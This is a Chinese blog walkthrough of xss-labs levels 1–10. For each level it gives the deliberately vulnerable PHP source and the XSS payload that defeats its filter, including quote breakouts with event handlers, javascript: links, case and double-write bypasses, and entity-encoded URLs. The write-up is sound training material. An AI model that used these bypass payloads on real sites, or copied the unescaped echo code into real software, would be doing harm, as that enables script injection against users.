XSS靶场1-10

最新推荐文章于 2024-08-07 00:00:21 发布
最新推荐文章于 2024-08-07 00:00:21 发布
阅读量1.7k 收藏 24
点赞数 31
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78612169/article/details/136851420
版权

less-1(反射型)

关卡1源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

第一关对于用户的输入没有做任何的过滤,所以我们直接注入

<script>alert(1)</script>

Less-2

源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

首先我们依照第一关直接注入

我们会发现失败,所以我们看源码 ,这里源码进行了过滤 htmlspecialchars($str)  他会将>转义,所以我们进行 “” 闭合

1"><script>alert(1)</script>

当然我们还可以使用点击事件等等来进行触发,如:

1" onclick = "alert(1)

因为设置的点击事件所以只需再点击一下即可 当然其他事件执行相对应的动作行为即可

Less-3

源码;

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level4.php?keyword=try harder!"; 
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

看第三关源代码发现  他与第二关几乎差不多 但值得注意的是第二关是双引号闭合   第三关仔细观察发现是单引号 所以我们执行带引号闭合+点击事件完成

1' onclick = ' alert(1)

Less-4

源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level5.php?keyword=find a way out!"; 
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

这关进行了过滤 <>符号 其实对咱们没啥影响 直接用点击事件进行就可以

1" onclick = " alert(1)

Less-5

     源码   

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level6.php?keyword=break it out!"; 
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

看源码发现他过滤了 “”on“ “<script” 所以我们不能再用前几关的方法,我们要找出另一个标签可以运行逃逸这样的过滤 ,一开始我想到

<img src=“111” alt=“加载失败”  onerrror = "alert(1)"这个样式进行加载报错进行注入  但是他的过滤式全局所以不行 思考后我们用 < a 标签

<a (超链接标签)标签 里面可以嵌套 JavaScript的伪协议(javascript:) ,也就是可以用<a 进行绕过,绕过后记这点击呀亲!!

aaa" ><a href="javascript:alert(1)">aaaaaaa</a>

Less-6

源码:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level7.php?keyword=move up!"; 
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

第六关已经把可以过滤的几乎咱们所有的手段,但是他忽略了一点,英文是有大小写的滴,所以我们可是先大写试试

可以看的出来大写的的点击事件是可以在里面执行的,所以这就局简单了,没什么可说的。和第四关相同哦!!!!!

less-7

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level8.php?keyword=nice try!"; 
}
</script>
<title>欢迎来到level7</title>
</head>
<body>
<h1 align=center>欢迎来到level7</h1>
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level7.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

第七关也是能过滤的全部过滤了诶,大小写也没用,但是可以用双写的方法骗过过滤(人的脑子还是嘎嘎硬的额)。

aaaa" oonnclick = " alrt(1)

遇到全部过滤就试试双写,说不定可以发现新大陆呢亲!

Less-8

源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level9.php?keyword=not bad!"; 
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

此关也是全部过滤全局过滤,不知道有没有忘记有一关提记得javascript伪协议

,从这个方向我们入手

控制台看的出不来script依然被过滤了 ,那我们怎么办呢。记这我前面说的转义,假如我们用转义后的输入 然后他会自动再次转义回来是否可以·进行绕过注入,那么我们来试试看。

转义后的结果为:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

看出来他已经转移成功 ,那么我们只是需要添加链接,进行绕过。

Less-9

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level10.php?keyword=well done!"; 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

 这一关相比前一关只是多了一个检测 http://头部的过滤,那我们思考加入伊戈尔http://头部,只是加在哪里 我们加在最后试试

虽然他成功绕过但是他无法点击还是失败,那证明不能够加在最后面,那我们用http://替换1试试,加在中间

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;http://;&#39;&#41;

Less-10

源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level11.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>


<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level11.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

这一关和前几关不同了,这一关给了三个元素 ,并且还都给类型隐藏。但是别慌,我们就先给三个元素全部赋值看看

看的出来最后一个进入了。只要他进入了那咱呢就按照基本程序走

我们用点击事件搞搞看

语句进入 但是无法执行,思考一下是否是类型原因 更改类型 并执行点击事件绕过

OK,更改类型type=text 然后执行点击事件  进行绕过成功。

本文章到此结束,一下在无内容,谢谢各位看官老爷收看!!!!!!!!!!!!!!亲!!!

小骆不吃辣(嘎嘎努力版)
关注
xss靶场1-10
LIU6636LIU的博客
03-15 1042
然而,有个坏人在你的便条里偷偷藏了一个小精灵,这个小精灵会在其他人看到你的便条时,突然飞出来,搞破坏,比如将别人的购物车里的商品都换成了垃圾,或者指向了一家不怎么好的商店,让大家误以为那是特价商品的地方。因为很多时候输入内容是有长度限制的,真正的XSS攻击并不是一段毫无意义的弹窗代码,弹窗是为了验证漏洞的是否存在。4. **自我驱动和持续学习意识的养成:** 网络安全领域是一个不断演进和变化的领域,学习XSS攻击只是开始,更重要的是持续学习和不断跟进新的安全技术和趋势,这培养了我自我驱动的学习意识。
谜团XSS靶场1-10关解析
wang649的博客
11-27 1023
谜团XSS靶场1-7关解析 谜团靶场 简介 前两天觉得自己之前写的博客实在是不行,讲的东西都太基础了,都是千篇一律的内容,这方面的内容也比较难讲好,很多细节方面的东西我自己都不会,索性直接删去这部分内容重新开篇,直接进入实战(打靶机),这样在写博客的同时也不会因为写一篇基础性的文章时间太长而导致没有时间去练手,好了废话说到这里,开始打靶。 第一关 首先进到页面,页面什么输入框都没有,但是图片上告诉我们it’s easy 那我们就按照他图片上的走,既然他说了简单,那就直接在URL中进行xss注入 ?name
XSS靶场【1-10关】攻击攻略
坏坏-5的博客
07-12 912
本篇内容主要是针对xss-labs-master这个靶场环境进行攻击的攻略!
XSS线上靶场---prompt
qq_52016943的博客
07-30 900
XSS prompt
xss-challenge-tour(XSS靶场)1-10
00勇士王子的博客
09-06 868
第一关 第一关是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗 <script>alert(‘xss’)</script> payload <script>alert('xss')</script> 第二关 直接输入第一关的代码,没有弹窗,F12看一下代码,尝试进行闭合 下面是包含我们之前输入的内容的代码 <input name="keyword" value="<script>alert(/xss/)</scr.
XSS线上靶场---Warmups
qq_52016943的博客
08-01 2163
XSS线上靶场
【Web安全靶场xss-labs-master 1-20
likinguuu的博客
03-03 980
xss-labs-master
XSS靶场1-2
xdjxi的博客
03-07 148
第一关 只要触发alert()函数就能跳转到下一关,其他关卡也是一样的 先找输入点2、再找输出点 那么,我们应该如何输出呢?来分析一波源码 输出在标签之间,那么直接构造:<script>alert(/xss/)</script> 第二关 ...
靶场-xssXSS-labs靶场搭建及闯关练习(更新中)
qq_68643282的博客
02-19 609
网站配置信息,域名可填写为虚拟机的IP地址,或者换回地址127.0.0.1也可,根目录为:WWW\xss-labs-master\xss-labs-master,点击确认即可搭建成功。本文中是采用小皮面板集成环境在Windows操作系统进行搭建,操作系统为windows 2012。在浏览器输入URL访问出现以下界面,即可正常使用;打开小皮面板开启web服务,创建网站。【等待更新...............,我先做题】xss-labs-master.zip - 蓝奏云。下载源码,解压到小皮面板网站根目。
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
WEB渗透学习-XSS-labs靶场
04-20
1. **反射型XSS(Non-Persistent XSS)**:这是最常见的一种XSS,攻击者的恶意脚本通过用户点击链接或者提交表单时的参数传递到服务器,再反射回用户的浏览器。在XSS-labs中,你可以通过构造特殊URL来触发这类XSS。 ...
xss-labs靶场通关
10-13
方法1:不逃逸input标签闭合前边的双引号加个事件触发xss,点击输入框即可触发payload为:" onfocus="alert(/xss/) (/xss/)'>"。 方法2:逃逸出input标签执行另外的标签触发xss,可以使用标签payload为:">(/xss/)...
xss-lab靶场资源包
07-27
XSS(Cross-Site Scripting)实验室靶场资源包是一个专为网络安全研究者和学习者设计的实践平台,主要用于深入理解和掌握XSS攻击的各种类型、防范措施以及漏洞检测技术。这个资源包通常包含一系列精心设计的实验场景...
XSS (跨站脚本攻击) 详解
最新发布
TechEnthusiast的博客
08-07 10
XSS(Cross-Site Scripting)是一种常见的web应用程序漏洞,允许攻击者将恶意脚本注入到其他用户浏览的网页中。当受害者浏览这些被注入恶意脚本的页面时,脚本会在用户的浏览器中执行,可能导致各种安全问题。XSS攻击之所以危险,是因为它能够绕过同源策略(Same-Origin Policy),这是浏览器的一种安全机制,用于限制不同源之间的交互。
CTFHub技能树web——XSS——DOM反射
qq_48368964的博客
08-02 417
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
xss漏洞(三,xss进阶利用)
2302_80280669的博客
08-03 551
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
CTFHub——XSS——反射型
qq_48368964的博客
08-01 388
平台测试语句注入,将得到的url编码地址填入url框(此过程模拟用户被诱导点击链接)发现为表单式,猜测哪个可能存在注入漏洞,分别做测试注入发现name框存在。但不是对方cookie,参考wp发现要用xss线上平台。
xss靶场403 - forbidden 禁止访问: 访问被拒绝
09-16
403 - forbidden 禁止访问是一种常见的网络错误状态码,在xss靶场中表示访问被拒绝。 当我们在访问xss靶场时,如果遇到403错误,意味着我们没有足够的权限或者没有通过认证来访问该资源。403错误一般由服务器返回,用于告诉客户端请求的资源被禁止访问。 造成403错误的原因有多种可能,以下是一些常见的情况: 1. 权限不足:我们可能没有足够的权限来访问该资源,例如需要登录或者注册才能获得访问权限。在xss靶场中,为了保护敏感信息和用户数据免受未经授权的访问,可能会对某些资源进行权限限制。 2. 访问限制:某些场景下,服务器可能会对特定的IP地址、用户或者区域设置访问限制。这种限制可能是为了防止恶意攻击或者保护特定数据免受未经授权的访问。 3. 路径错误:有时候我们可能会访问错误的路径或者链接,导致服务器无法找到资源返回403错误。在xss靶场中,通常会有多个路径和链接,对每个资源进行了独立的设置和限制,如果我们访问的路径不存在或者错误,就会返回403错误。 当我们遇到403错误时,可以尝试以下几个解决办法: 1. 检查权限和认证:确保我们已经登录或者注册,并且获得了足够的权限来访问该资源。 2. 检查路径和链接:确认我们访问的路径或者链接是否错误或者不存在,避免访问错误的资源。 3. 联系管理员:如果以上方法都无法解决问题,我们可以尝试联系xss靶场的管理员,向其报告问题,以便获得更多的帮助和支持。 总结来说,403错误表示我们的访问被拒绝,可能是因为权限不足、访问限制或者路径错误等原因造成的。解决该问题需要检查权限和认证、确认路径和链接是否正确,并在需要时联系管理员寻求帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值